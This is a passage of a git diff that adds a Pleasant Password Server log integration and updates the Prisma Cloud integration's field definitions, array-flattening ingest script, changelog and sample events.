"forwarded", + "pps-log" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| client.ip | IP address of the client (IPv4 or IPv6). | ip | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| input.type | Input type | keyword | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.offset | Log offset | long | +| log.source.address | Log source address | keyword | +| log.syslog.priority | Syslog numeric priority of the event, if available. According to RFCs 5424 and 3164, the priority is 8 \* facility + severity. This number is therefore expected to contain a value between 0 and 191. | long | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.email | User email address. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + diff --git a/packages/pps/img/logo.svg b/packages/pps/img/logo.svg new file mode 100644 index 00000000000..7ba8efcbb77 --- /dev/null +++ b/packages/pps/img/logo.svg @@ -0,0 +1,28 @@ + + + + + + diff --git a/packages/pps/manifest.yml b/packages/pps/manifest.yml new file mode 100644 index 00000000000..9b9c66d40e4 --- /dev/null +++ b/packages/pps/manifest.yml @@ -0,0 +1,109 @@ +format_version: 3.0.3 +name: pps +title: "Pleasant Password Server" +version: 0.0.1 +source: + license: "Apache-2.0" +description: "Integration for Pleasant Password Server Syslog Messages" +type: integration +categories: + - custom + - productivity + - security +conditions: + kibana: + version: "^8.0.0" + elastic: + subscription: "basic" +icons: + - src: /img/logo.svg + title: PPS logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: Pleasant Password Server + title: Pleasant Password Server logs + description: Collect Pleasant Password Server logs. + inputs: + - type: logfile + vars: + - name: paths + type: text + title: Paths + multi: true + required: true + show_user: true + title: Collect logs from Pleasant Password Server via File input + description: Collecting syslog from Pleasant Password Server via File input. + - type: tcp + vars: + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for TCP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The TCP port number to listen on. + multi: false + required: true + show_user: true + default: 9037 + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- + title: Collect logs from Pleasant Password Server via TCP input + description: Collecting logs from Pleasant Password Server via TCP input. + - type: udp + vars: + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for UDP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The UDP port number to listen on. + multi: false + required: true + show_user: true + default: 9038 + title: Collect logs from Pleasant Password Server via UDP input + description: Collecting syslog from Pleasant Password Server via UDP input. +owner: + github: elastic/security-service-integrations + type: community diff --git a/packages/prisma_cloud/changelog.yml b/packages/prisma_cloud/changelog.yml index 541ac657f79..20167de590b 100644 --- a/packages/prisma_cloud/changelog.yml +++ b/packages/prisma_cloud/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9517 +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/prisma_cloud/data_stream/alert/fields/fields.yml b/packages/prisma_cloud/data_stream/alert/fields/fields.yml index 73ef5344d0c..2e097ebbe8a 100644 --- a/packages/prisma_cloud/data_stream/alert/fields/fields.yml +++ b/packages/prisma_cloud/data_stream/alert/fields/fields.yml @@ -296,6 +296,8 @@ fields: - name: id type: keyword + - name: compliance_id + type: keyword - name: custom_assigned type: boolean - name: policy diff --git a/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json b/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json index 6dfb45f582e..c9605adb0c4 100644 --- a/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json +++ b/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json @@ -149,13 +149,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -334,13 +332,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -499,13 +495,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -622,13 +616,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -890,13 +882,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", diff --git a/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml b/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml index 485becc4a7f..66fa48b29c0 100644 --- a/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml +++ b/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml @@ -4115,6 +4115,74 @@ processors: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + + - script: + description: Flatten arrays of arrays. + tag: flatten_array + lang: painless + source: | + def flatten(def aa) { + if (!(aa instanceof List)) { + if (aa instanceof String) { + return aa; + } + return null; + } + if (aa.length == 1) { + // Ensure lexical ordering is consistent between single array optimisation and full set extraction. + Collections.sort(aa[0]); + return aa[0]; + } + def set = new HashSet(); + for (def a: aa) { + for (def e: a) { + set.add(e); + } + } + def list = new ArrayList(); + for (def e: set) { + list.add(e); + } + Collections.sort(list); + return list; + } + + if (ctx.prisma_cloud?.host?.all_compliance?.data != null) { + for (int i; i < ctx.prisma_cloud.host.all_compliance.data.length; i++) { + ctx.prisma_cloud.host.all_compliance.data[i].templates = flatten(ctx.prisma_cloud.host.all_compliance.data[i].templates); + } + } + if (ctx.prisma_cloud?.host?.compliance_issues?.data != null) { + for (int i; i < ctx.prisma_cloud.host.compliance_issues.data.length; i++) { + ctx.prisma_cloud.host.compliance_issues.data[i].templates = flatten(ctx.prisma_cloud.host.compliance_issues.data[i].templates); + } + } + if (ctx.prisma_cloud?.host?.history != null) { + for (int i; i < ctx.prisma_cloud.host.history.length; i++) { + if (ctx.prisma_cloud.host.history[i].vulnerabilities == null) { + continue; + } + for (int j; j < ctx.prisma_cloud.host.history[i].vulnerabilities.length; j++) { + ctx.prisma_cloud.host.history[i].vulnerabilities[j].templates = flatten(ctx.prisma_cloud.host.history[i].vulnerabilities[j].templates); + } + } + } + if (ctx.prisma_cloud?.host?.image?.history != null) { + for (int i; i < ctx.prisma_cloud.host.image.history.length; i++) { + if (ctx.prisma_cloud.host.image.history[i].vulnerabilities == null) { + continue; + } + for (int j; j < ctx.prisma_cloud.host.image.history[i].vulnerabilities.length; j++) { + ctx.prisma_cloud.host.image.history[i].vulnerabilities[j].templates = flatten(ctx.prisma_cloud.host.image.history[i].vulnerabilities[j].templates); + } + } + } + if (ctx.prisma_cloud?.host?.vulnerabilities?.data != null) { + for (int i; i < ctx.prisma_cloud.host.vulnerabilities.data.length; i++) { + ctx.prisma_cloud.host.vulnerabilities.data[i].templates = flatten(ctx.prisma_cloud.host.vulnerabilities.data[i].templates); + } + } + - remove: field: - json diff --git a/packages/prisma_cloud/data_stream/host/fields/fields.yml b/packages/prisma_cloud/data_stream/host/fields/fields.yml index 38997b03d3b..16b11842fc7 100644 --- a/packages/prisma_cloud/data_stream/host/fields/fields.yml +++ b/packages/prisma_cloud/data_stream/host/fields/fields.yml @@ -398,6 +398,9 @@ - name: status type: keyword description: Vendor status for the vulnerability. + - name: templates + type: keyword + description: List of templates with which the vulnerability is associated. - name: text type: keyword description: Description of the violation. @@ -425,7 +428,7 @@ - name: name type: keyword description: Name of the tag. - - name: wildfire_malware + - name: wild_fire_malware type: group fields: - name: md5 @@ -740,7 +743,7 @@ - name: applicable_rules type: keyword description: Rules applied on the package. - - name: binaryPkgs + - name: binary_pkgs type: keyword description: Names of the distro binary package names (packages which are built from the source of the package). - name: block @@ -1322,6 +1325,9 @@ - name: kind type: keyword description: ExploitKind represents the kind of the exploit. + - name: link + type: keyword + description: Link is a link to information about the exploit. - name: source type: keyword description: ExploitType represents the source of an exploit. diff --git a/packages/prisma_cloud/data_stream/host/sample_event.json b/packages/prisma_cloud/data_stream/host/sample_event.json index cb4d6bcca9f..0767ddb9c23 100644 --- a/packages/prisma_cloud/data_stream/host/sample_event.json +++ b/packages/prisma_cloud/data_stream/host/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-11-03T06:33:54.250Z", + "@timestamp": "2024-04-03T23:20:14.863Z", "agent": { - "ephemeral_id": "64d561d9-fd72-4f78-b68c-87702b5c3493", - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "ephemeral_id": "a2e1faf9-a21e-4a2e-a964-e756be243ce0", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "cloud": { "account": { @@ -32,9 +32,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", @@ -43,7 +43,7 @@ ], "dataset": "prisma_cloud.host", "id": "DESKTOP-6PQXXMS", - "ingested": "2023-11-03T06:33:55Z", + "ingested": "2024-04-03T23:20:24Z", "kind": "event", "original": "{\"_id\":\"DESKTOP-6PQXXMS\",\"binaries\":[{\"altered\":true,\"cveCount\":0,\"deps\":[\"string\"],\"fileMode\":0,\"functionLayer\":\"string\",\"md5\":\"string\",\"missingPkg\":true,\"name\":\"string\",\"path\":\"string\",\"pkgRootDir\":\"string\",\"services\":[\"string\"],\"version\":\"string\"}],\"cloudMetadata\":{\"accountID\":\"Non-onboarded cloud accounts\",\"awsExecutionEnv\":\"string\",\"image\":\"string\",\"labels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:49.949Z\",\"value\":\"string\"}],\"name\":\"string\",\"provider\":[\"aws\"],\"region\":\"string\",\"resourceID\":\"string\",\"resourceURL\":\"string\",\"type\":\"string\",\"vmID\":\"string\",\"vmImageID\":\"string\"},\"type\":\"host\",\"hostname\":\"DESKTOP-6PQXXMS\",\"scanTime\":\"2023-08-23T11:48:41.803Z\",\"Secrets\":[],\"osDistro\":\"windows\",\"osDistroVersion\":\"string\",\"osDistroRelease\":\"Windows\",\"distro\":\"Microsoft Windows [Version 10.0.19045.2006]\",\"packageManager\":true,\"packages\":[{\"pkgs\":[{\"binaryIdx\":[0],\"binaryPkgs\":[\"string\"],\"cveCount\":0,\"defaultGem\":true,\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"functionLayer\":\"string\",\"goPkg\":true,\"jarIdentifier\":\"string\",\"layerTime\":0,\"license\":\"string\",\"name\":\"string\",\"osPackage\":true,\"path\":\"string\",\"version\":\"string\"}],\"pkgsType\":\"nodejs\"}],\"isARM64\":false,\"packageCorrelationDone\":true,\"redHatNonRPMImage\":false,\"image\":{\"created\":\"0001-01-01T00:00:00Z\",\"entrypoint\":[\"string\"],\"env\":[\"string\"],\"healthcheck\":true,\"id\":\"string\",\"labels\":{},\"layers\":[\"string\"],\"os\":\"string\",\"repoDigest\":[\"string\"],\"repoTags\":[\"string\"],\"user\":\"string\",\"workingDir\":\"string\"},\"allCompliance\":{\"compliance\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.949Z\",\"exploit\":[\"exploit-db\"],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}],\"enabled\":\"true\"},\"clusters\":[\"string\"],\"repoTag\":null,\"tags\":[{\"digest\":\"string\",\"id\":\"string\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"trustResult\":{\"hostsStatuses\":[{\"host\":\"string\",\"status\":\"trusted\"}]},\"repoDigests\":[],\"creationTime\":\"0001-01-01T00:00:00Z\",\"pushTime\":\"0001-01-01T00:00:00Z\",\"vulnerabilitiesCount\":0,\"complianceIssuesCount\":4,\"vulnerabilityDistribution\":{\"critical\":0,\"high\":0,\"medium\":0,\"low\":0,\"total\":0},\"complianceDistribution\":{\"critical\":4,\"high\":0,\"medium\":0,\"low\":0,\"total\":4},\"vulnerabilityRiskScore\":0,\"complianceRiskScore\":4000000,\"riskFactors\":{},\"firstScanTime\":\"2023-08-11T06:53:57.456Z\",\"history\":[{\"baseLayer\":true,\"created\":0,\"emptyLayer\":true,\"id\":\"string\",\"instruction\":\"string\",\"sizeBytes\":0,\"tags\":[\"string\"],\"vulnerabilities\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.950Z\",\"exploit\":[\"exploit-db\"],\"exploits\":[{\"kind\":[\"poc\",\"in-the-wild\"],\"link\":\"string\",\"source\":[\"\",\"exploit-db\"]}],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}]}],\"hostDevices\":[{\"ip\":\"0.0.0.0\",\"name\":\"string\"}],\"hosts\":{},\"id\":\"string\",\"err\":\"\",\"collections\":[\"All\"],\"instances\":[{\"host\":\"string\",\"image\":\"string\",\"modified\":\"2023-09-08T04:01:49.951Z\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"scanID\":0,\"trustStatus\":\"\",\"externalLabels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:49.949Z\",\"value\":\"string\"}],\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"firewallProtection\":{\"enabled\":false,\"supported\":false,\"outOfBandMode\":\"Observation\",\"ports\":[0],\"tlsPorts\":[0],\"unprotectedProcesses\":[{\"port\":0,\"process\":\"string\",\"tls\":true}]},\"applications\":[{\"installedFromPackage\":true,\"knownVulnerabilities\":0,\"layerTime\":0,\"name\":\"string\",\"path\":\"string\",\"service\":true,\"version\":\"string\"}],\"appEmbedded\":false,\"wildFireUsage\":null,\"agentless\":false,\"malwareAnalyzedTime\":\"0001-01-01T00:00:00Z\"}", "start": "0001-01-01T00:00:00.000Z", @@ -75,11 +75,11 @@ "type": "host" }, "input": { - "type": "udp" + "type": "tcp" }, "log": { "source": { - "address": "192.168.243.5:34718" + "address": "172.18.0.4:60388" } }, "os": { @@ -143,9 +143,7 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", @@ -356,9 +354,7 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", diff --git a/packages/prisma_cloud/docs/README.md b/packages/prisma_cloud/docs/README.md index dc5212a669b..55ff2c3ac7a 100644 --- a/packages/prisma_cloud/docs/README.md +++ b/packages/prisma_cloud/docs/README.md @@ -419,6 +419,7 @@ An example event for `alert` looks as following: | prisma_cloud.alert.resource.url | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.cloud_type | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.compliance.id | | keyword | +| prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.compliance_id | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.custom_assigned | | boolean | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.policy.id | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.requirement.description | | keyword | @@ -608,13 +609,13 @@ An example event for `host` looks as following: ```json { - "@timestamp": "2023-11-03T06:33:54.250Z", + "@timestamp": "2024-04-03T23:20:14.863Z", "agent": { - "ephemeral_id": "64d561d9-fd72-4f78-b68c-87702b5c3493", - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "ephemeral_id": "a2e1faf9-a21e-4a2e-a964-e756be243ce0", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "cloud": { "account": { @@ -641,9 +642,9 @@ An example event for `host` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", @@ -652,7 +653,7 @@ An example event for `host` looks as following: ], "dataset": "prisma_cloud.host", "id": "DESKTOP-6PQXXMS", - "ingested": "2023-11-03T06:33:55Z", + "ingested": "2024-04-03T23:20:24Z", "kind": "event", "original": "{\"_id\":\"DESKTOP-6PQXXMS\",\"binaries\":[{\"altered\":true,\"cveCount\":0,\"deps\":[\"string\"],\"fileMode\":0,\"functionLayer\":\"string\",\"md5\":\"string\",\"missingPkg\":true,\"name\":\"string\",\"path\":\"string\",\"pkgRootDir\":\"string\",\"services\":[\"string\"],\"version\":\"string\"}],\"cloudMetadata\":{\"accountID\":\"Non-onboarded cloud accounts\",\"awsExecutionEnv\":\"string\",\"image\":\"string\",\"labels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:49.949Z\",\"value\":\"string\"}],\"name\":\"string\",\"provider\":[\"aws\"],\"region\":\"string\",\"resourceID\":\"string\",\"resourceURL\":\"string\",\"type\":\"string\",\"vmID\":\"string\",\"vmImageID\":\"string\"},\"type\":\"host\",\"hostname\":\"DESKTOP-6PQXXMS\",\"scanTime\":\"2023-08-23T11:48:41.803Z\",\"Secrets\":[],\"osDistro\":\"windows\",\"osDistroVersion\":\"string\",\"osDistroRelease\":\"Windows\",\"distro\":\"Microsoft Windows [Version 10.0.19045.2006]\",\"packageManager\":true,\"packages\":[{\"pkgs\":[{\"binaryIdx\":[0],\"binaryPkgs\":[\"string\"],\"cveCount\":0,\"defaultGem\":true,\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"functionLayer\":\"string\",\"goPkg\":true,\"jarIdentifier\":\"string\",\"layerTime\":0,\"license\":\"string\",\"name\":\"string\",\"osPackage\":true,\"path\":\"string\",\"version\":\"string\"}],\"pkgsType\":\"nodejs\"}],\"isARM64\":false,\"packageCorrelationDone\":true,\"redHatNonRPMImage\":false,\"image\":{\"created\":\"0001-01-01T00:00:00Z\",\"entrypoint\":[\"string\"],\"env\":[\"string\"],\"healthcheck\":true,\"id\":\"string\",\"labels\":{},\"layers\":[\"string\"],\"os\":\"string\",\"repoDigest\":[\"string\"],\"repoTags\":[\"string\"],\"user\":\"string\",\"workingDir\":\"string\"},\"allCompliance\":{\"compliance\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.949Z\",\"exploit\":[\"exploit-db\"],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}],\"enabled\":\"true\"},\"clusters\":[\"string\"],\"repoTag\":null,\"tags\":[{\"digest\":\"string\",\"id\":\"string\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"trustResult\":{\"hostsStatuses\":[{\"host\":\"string\",\"status\":\"trusted\"}]},\"repoDigests\":[],\"creationTime\":\"0001-01-01T00:00:00Z\",\"pushTime\":\"0001-01-01T00:00:00Z\",\"vulnerabilitiesCount\":0,\"complianceIssuesCount\":4,\"vulnerabilityDistribution\":{\"critical\":0,\"high\":0,\"medium\":0,\"low\":0,\"total\":0},\"complianceDistribution\":{\"critical\":4,\"high\":0,\"medium\":0,\"low\":0,\"total\":4},\"vulnerabilityRiskScore\":0,\"complianceRiskScore\":4000000,\"riskFactors\":{},\"firstScanTime\":\"2023-08-11T06:53:57.456Z\",\"history\":[{\"baseLayer\":true,\"created\":0,\"emptyLayer\":true,\"id\":\"string\",\"instruction\":\"string\",\"sizeBytes\":0,\"tags\":[\"string\"],\"vulnerabilities\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.950Z\",\"exploit\":[\"exploit-db\"],\"exploits\":[{\"kind\":[\"poc\",\"in-the-wild\"],\"link\":\"string\",\"source\":[\"\",\"exploit-db\"]}],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}]}],\"hostDevices\":[{\"ip\":\"0.0.0.0\",\"name\":\"string\"}],\"hosts\":{},\"id\":\"string\",\"err\":\"\",\"collections\":[\"All\"],\"instances\":[{\"host\":\"string\",\"image\":\"string\",\"modified\":\"2023-09-08T04:01:49.951Z\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"scanID\":0,\"trustStatus\":\"\",\"externalLabels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:49.949Z\",\"value\":\"string\"}],\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"firewallProtection\":{\"enabled\":false,\"supported\":false,\"outOfBandMode\":\"Observation\",\"ports\":[0],\"tlsPorts\":[0],\"unprotectedProcesses\":[{\"port\":0,\"process\":\"string\",\"tls\":true}]},\"applications\":[{\"installedFromPackage\":true,\"knownVulnerabilities\":0,\"layerTime\":0,\"name\":\"string\",\"path\":\"string\",\"service\":true,\"version\":\"string\"}],\"appEmbedded\":false,\"wildFireUsage\":null,\"agentless\":false,\"malwareAnalyzedTime\":\"0001-01-01T00:00:00Z\"}", "start": "0001-01-01T00:00:00.000Z", @@ -684,11 +685,11 @@ An example event for `host` looks as following: "type": "host" }, "input": { - "type": "udp" + "type": "tcp" }, "log": { "source": { - "address": "192.168.243.5:34718" + "address": "172.18.0.4:60388" } }, "os": { @@ -752,9 +753,7 @@ An example event for `host` looks as following: "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", @@ -965,9 +964,7 @@ An example event for `host` looks as following: "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", @@ -1272,6 +1269,7 @@ An example event for `host` looks as following: | prisma_cloud.host.compliance_issues.data.risk_factors | RiskFactors maps the existence of vulnerability risk factors. | flattened | | prisma_cloud.host.compliance_issues.data.severity | Textual representation of the vulnerability's severity. | keyword | | 